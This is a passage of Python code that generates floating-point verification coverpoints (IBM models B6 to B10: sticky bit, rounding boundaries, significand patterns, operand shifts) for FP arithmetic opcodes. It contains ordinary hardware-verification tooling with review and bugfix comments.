        elif opcode in 'fmsub':
            rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        if(flen==32):
            # Round-trip through single precision.
            # NOTE(review): x1/x2/x3 are never read afterwards.
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fmul','fdiv']:
            b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    #print(*b6_comb,sep='\n')
    coverpoints = []
    k=0
    for c in b6_comb:
        # One coverpoint per rounding mode (rm_val 0..4) per operand tuple.
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B6 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b7(flen, opcode, ops, seed=-1):
    '''
    IBM Model B7 Definition:
        This model checks that the sticky bit is calculated correctly in each of the following cases (for every possible combination in the table). The Guard bit should always be 0, and the sign positive, so that miscalculation of the sticky bit will alter the final result.

        Mask in Extra bits

        .. code-block::

                1000...000
                0100...000
                …
                0000...010
                0000...001
                0000000000

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int
    :return: list of coverpoint strings (one per dataset entry; rounding mode fixed)

    Abstract Dataset Description:
        Intermediate Results = [ieee754_maxnorm, maxnum, maxdec, maxnum]
        {It assures the calculation of sticky bit for every possible combination in the table}
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The Sticky bit is calculated in each case. The guard bit here is always assumed to be zero and the sign is positive, so that miscalculation of the sticky bit will alter the final result.
        - In the intermediate result dataset, the elements are appended as elements before the character 'p' and then the binary equivalent of '010' + pow(2,i).
        - Finally on the extra bits, it is masked with the comment created in the previous point. All the first character of each element is converted to its floating point equivalent in a loop
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with a fixed rounding mode for that particular opcode.
    '''
    # Strip the precision suffix ("fadd.d" -> "fadd").
    opcode = opcode.split('.')[0]
    # High Decimal precision: the derived operands may exceed float range.
    getcontext().prec = 60
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_num = []
        # Keep only the non-negative subnormal/normal seeds ('-' filtered out).
        for i in fsubnorm+fnorm:
            float_val = float.hex(fields_dec_converter(32,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
        ir_dataset = []
        for k in range(len(ieee754_num)):
            # Walk a single 1 through 21 extra-bit positions; the appended hex
            # digits encode '010' + that one-hot mask past the representable
            # mantissa, so rounding must consult the sticky bit.
            for i in range(0,20):
                comment = (20-i)*'0' + '1' + i*'0'
                ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+'{:021b}'.format(pow(2,i)),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Mask on extra bits ---> ' + comment])
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        ieee754_num = []
        for i in dsubnorm+dnorm:
            float_val = fields_dec_converter(64,i)
            if float_val > 0:
                ieee754_num.append(str(float_val))
        ir_dataset = []
        # Decimal-domain equivalent of the one-hot extra-bit mask: add a fixed
        # guard offset plus a power-of-two perturbation at varying depth.
        for l in range(len(ieee754_num)):
            for k in range(1,13):
                for i in range(4):
                    comment = (k*(i+1))*'0' + '1' + (51-(k*(i+1)))*'0'
                    ir_dataset.append([str(Decimal(ieee754_num[l].split('e')[0])+Decimal(pow(16,-14))+Decimal(pow(pow(2,3-i)*16,-14-k)))+'e'+ieee754_num[l].split('e')[1],' | Mask on extra bits ---> ' + comment])
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible.
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    b7_comb = []
    for i in range(len(ir_dataset)):
        # rs1/rs3 random; rs2 back-solved so rs1 <op> rs2 (and rs3 for fused
        # ops) reproduces the target intermediate result.
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        if(flen==32):
            # Round-trip through single precision.
            # NOTE(review): x1/x2/x3 are never read afterwards.
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b7_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    k = 0
    for c in b7_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        # B7 pins a single rounding mode (rm_val 3) rather than sweeping all.
        cvpt += 'rm_val == 3'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += ir_dataset[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B7 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b8(flen, opcode, ops, seed=-1):
    '''
    IBM Model B8 Definition:
        This model targets numbers that are on the edge of a rounding boundary. These boundaries may vary depending on the rounding mode. These numbers include floating-point numbers and midpoints between floating-point numbers. In order to target the vicinity of these numbers, we test the following constraints on the extra bits of the intermediate result:

        1. All values of extra-bits in the range [000...00001, 000...00011]
        2. All values of extra-bits in the range [111...11100, 111...11111]

        For each value selected above, test all the combinations on the LSB of the significand, the guard bit, and the sticky bit (if the number of extra bits is not finite).

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int
    :return: list of coverpoint strings (one per dataset entry and rounding mode)

    Abstract Dataset Description:
        Intermediate Results = [For every Subnormal and Normal number, 8 combinations of guard, round and sticky bit are appended, along with 6 combinations(3 positive, 3 negative) of the mask on extra bits]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above. The coverpoints can be increased by increasing the dataset of normal and subnormal numbers.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. In order to represent numbers that went out of range of the maximum representable number in python, the "Decimal" module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    # Strip the precision suffix ("fadd.d" -> "fadd").
    opcode = opcode.split('.')[0]
    # High Decimal precision: derived operands may exceed float range.
    getcontext().prec = 60
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_num = []
        # Keep only the non-negative subnormal/normal seeds.
        for i in fsubnorm+fnorm:
            float_val = float.hex(fields_dec_converter(32,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
        ir_dataset = []
        # For every seed value: j (3 bits) enumerates guard/round/sticky,
        # i (2 bits) enumerates the low extra-bit mask; both an all-zeros and
        # an all-ones filler between them are emitted as extra mantissa hex
        # digits beyond the representable precision.
        for k in range(len(ieee754_num)):
            for i in range(1,4):
                for j in range(1,8):
                    grs = '{:03b}'.format(j)
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        ieee754_num = []
        for i in dsubnorm+dnorm:
            float_val = float.hex(fields_dec_converter(64,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:17]+'p'+float_val.split('p')[1])
        ir_dataset = []
        for k in range(len(ieee754_num)):
            for i in range(1,4):
                for j in range(1,8):
                    grs = '{:03b}'.format(j)
                    # BUGFIX: the leading three extra bits were hard-coded to
                    # '010' here (unlike the flen==32 branch), so the entries
                    # ignored j and the Guard/Round/Sticky comment was wrong;
                    # use j's bit pattern like the 32-bit path does.
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible.
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    b8_comb = []
    for i in range(len(ir_dataset)):
        # rs1/rs3 random; rs2 back-solved so rs1 <op> rs2 (and rs3 for fused
        # ops) reproduces the target intermediate result.
        rs1 = random.uniform(1,ir_dataset[i][0])
        rs3 = random.uniform(1,ir_dataset[i][0])
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        if(flen==32):
            # Round-trip through single precision.
            # NOTE(review): x1/x2/x3 are never read afterwards.
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b8_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    k=0
    for c in b8_comb:
        # One coverpoint per rounding mode (rm_val 0..4) per operand tuple.
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B8 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b9(flen, opcode, ops):
    '''
    IBM Model B9 Definition:
        This model tests special patterns in the significands of the input operands. Each
        of the input operands should contain one of the following patterns (each
        sequence can be of length 0 up to the number of bits in the significand - the
        more interesting cases will be chosen).

        1. A sequence of leading zeroes
        2. A sequence of leading ones
        3. A sequence of trailing zeroes
        4. A sequence of trailing ones
        5. A small number of 1s as compared to 0s
        6. A small number of 0s as compared to 1s
        7. A "checkerboard" pattern (for example 00110011... or 011011011...)
        8. Long sequences of 1s
        9. Long sequences of 0s

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :type flen: int
    :type opcode: str
    :type ops: int
    :return: list of coverpoint strings (rounding mode fixed to 0)

    Abstract Dataset Description:
        Operand1, Operand2 ∈ [A sequence of leading zeroes, A sequence of leading ones, A sequence of trailing zeroes, A sequence of trailing ones, A small number of 1s as compared to 0s, A small number of 0s as compared to 1s, A "checkerboard" pattern (for example 00110011... or 011011011...), Long sequences of 1s, Long sequences of 0s]

    Implementation:
        - The rs1 array is appended with the elements of flip types and then for each iteration, the respective sign, mantissa and exponent is computed.
        - A nested loop is initialized, assuming the rs1 mantissa as the base number and rs2 sign and rs2 exponent is obtained directly from the rs1 sign and rs1 exponent. Rs2 mantissa is calculated by adding the iteration number in the beginning of rs1 mantissa. This is done respectively for each repeating pattern.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.

    Note:
        BUGFIX applied throughout: fields_dec_converter was called with a
        hard-coded width of 32 even when flen == 64, decoding double-precision
        bit patterns with the single-precision decoder; it now receives flen
        (the same call is already made with 64 elsewhere in this file).
    '''
    # Strip the precision suffix ("fadd.d" -> "fadd").
    opcode = opcode.split('.')[0]
    if flen == 32:
        flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
        e_sz=8
    elif flen == 64:
        flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
        e_sz=11
    rs1 = []
    b9_comb = []
    comment = []
    if ops == 2:
        for i in range(len(flip_types)):
            rs1.append(flip_types[i])
        for i in range(len(rs1)):
            # Prefix '1' keeps leading zeros when converting hex->bin; [3:]
            # drops the '0b1' marker, leaving the raw sign/exp/mantissa bits.
            bin_val = bin(int('1'+rs1[i][2:],16))[3:]
            rs1_sgn = bin_val[0]
            rs1_exp = bin_val[1:e_sz+1]
            rs1_man = bin_val[e_sz+1:]
            # Each pattern is emitted twice: once as rs2 (rs1 fixed) and once
            # swapped into the rs1 slot, so both operand positions see it.
            for j in range(len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '0'*j + rs1_man[j:] # Leading 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(' | Leading zeroes ---> rs2_man = '+rs2_man)
                b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(' | Leading zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(' | Leading ones ---> rs2_man = '+rs2_man)
                b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(' | Leading ones ---> rs1_man = '+rs2_man)
                rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(' | Trailing zeroes ---> rs2_man = '+rs2_man)
                b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(' | Trailing zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(' | Trailing ones ---> rs2_man = '+rs2_man)
                b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(' | Trailing ones ---> rs1_man = '+rs2_man)
            # Long runs: only the last ~10% of split positions (the "more
            # interesting cases").
            for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(' | Long sequence of ones ---> rs2_man = '+rs2_man)
                b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(' | Long sequence of ones ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
                b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                # Tile the pattern past the mantissa width, then truncate.
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(' | Checkerboard pattern ---> rs2_man = '+rs2_man)
                b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(' | Checkerboard pattern ---> rs1_man = '+rs2_man)
    else:
        # Single-operand opcodes: emit each patterned value alone, restricted
        # to non-negative inputs.
        for i in range(len(flip_types)):
            rs1.append(flip_types[i])
        for i in range(len(rs1)):
            bin_val = bin(int('1'+rs1[i][2:],16))[3:]
            rs1_sgn = bin_val[0]
            rs1_exp = bin_val[1:e_sz+1]
            rs1_man = bin_val[e_sz+1:]
            if rs1_sgn != '1':
                for j in range(len(rs1_man)):
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    rs2_man = '0'*j + rs1_man[j:] # Leading 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b9_comb.append((floatingPoint_tohex(flen,rs2),))
                    comment.append(' | Leading zeroes ---> rs1_man = '+rs2_man)
                    rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b9_comb.append((floatingPoint_tohex(flen,rs2),))
                    comment.append(' | Leading ones ---> rs1_man = '+rs2_man)
                    rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b9_comb.append((floatingPoint_tohex(flen,rs2),))
                    comment.append(' | Trailing zeroes ---> rs1_man = '+rs2_man)
                    rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b9_comb.append((floatingPoint_tohex(flen,rs2),))
                    comment.append(' | Trailing ones ---> rs1_man = '+rs2_man)
            # Force the sign positive for the remaining patterns.
            rs1_sgn = '0'
            for j in range(flen-e_sz-1-math.ceil(0.1*(flen-e_sz-1)), flen-e_sz-1):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((floatingPoint_tohex(flen,rs2),))
                comment.append(' | Long sequence of ones ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((floatingPoint_tohex(flen,rs2),))
                comment.append(' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b9_comb.append((floatingPoint_tohex(flen,rs2),))
                comment.append(' | Checkerboard pattern ---> rs1_man = '+rs2_man)
    coverpoints = []
    k = 0
    for c in b9_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        # B9 pins rounding mode 0 rather than sweeping all modes.
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B9 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b10(flen, opcode, ops, N=-1, seed=-1):
    '''
    IBM Model B10 Definition:
        This model tests every possible value for a shift between the input operands.

        1. A value smaller than -(p + 4)
        2. All the values in the range [-(p + 4) , (p + 4)]
        3. A value larger than (p + 4)

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type N: int
